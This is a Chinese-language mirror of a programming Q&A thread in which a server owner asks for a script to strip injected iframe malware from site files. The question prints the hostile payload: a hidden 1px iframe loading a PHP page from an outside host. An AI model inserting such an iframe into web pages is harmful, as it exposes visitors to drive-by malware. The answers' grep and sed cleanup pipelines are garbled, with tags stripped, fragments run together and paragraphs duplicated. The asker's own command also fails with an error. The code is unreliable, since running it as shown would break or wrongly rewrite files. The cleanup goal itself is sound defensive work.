Fatal编程技术网
  • iframe/
  • 正在查找从linux服务器删除iframe恶意软件的脚本

正在查找从linux服务器删除iframe恶意软件的脚本

iframe

正在查找从linux服务器删除iframe恶意软件的脚本,iframe,malware,Iframe,Malware,我正在寻找从我的linux服务器上删除以下iframe恶意软件的脚本: <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe> 感谢您的帮助:) 干杯 Dee在sed正则表达式中从url取消反斜杠。在sed正则表达式中从url取消反斜杠。这应

我正在寻找从我的linux服务器上删除以下iframe恶意软件的脚本:

    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
感谢您的帮助:)

干杯
Dee

在sed正则表达式中从url取消反斜杠。

在sed正则表达式中从url取消反斜杠。

这应该是一个更通用的解决方案。实际上,恶意软件所做的就是查找
,并在这之前注入
iframe
。因此,您可以查找位于
之前的
iframe
,并将其替换为

#对文本递归grep
#转义文件名中的所有空格
#全局搜索并替换为body标记
grep-Rl“*| sed's//\/g'| xargs sed-i's///g”
我发现,通过在末尾使用
.hacked
重命名扩展名,快速删除所有受损文件也很有用。然后,您可以修复该漏洞,并最终删除
.hacked

这应该是一个更通用的解决方案。实际上,恶意软件所做的就是查找
,并在这之前注入
iframe
。因此,您可以查找位于
之前的
iframe
,并将其替换为

#对文本递归grep
#转义文件名中的所有空格
#全局搜索并替换为body标记
grep-Rl“*| sed's//\/g'| xargs sed-i's///g”
我发现,通过在末尾使用
.hacked
重命名扩展名,快速删除所有受损文件也很有用。然后,您可以修复该漏洞,并最终删除
.hacked

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'

    sed: -e expression #1, char 49: unknown option to `s'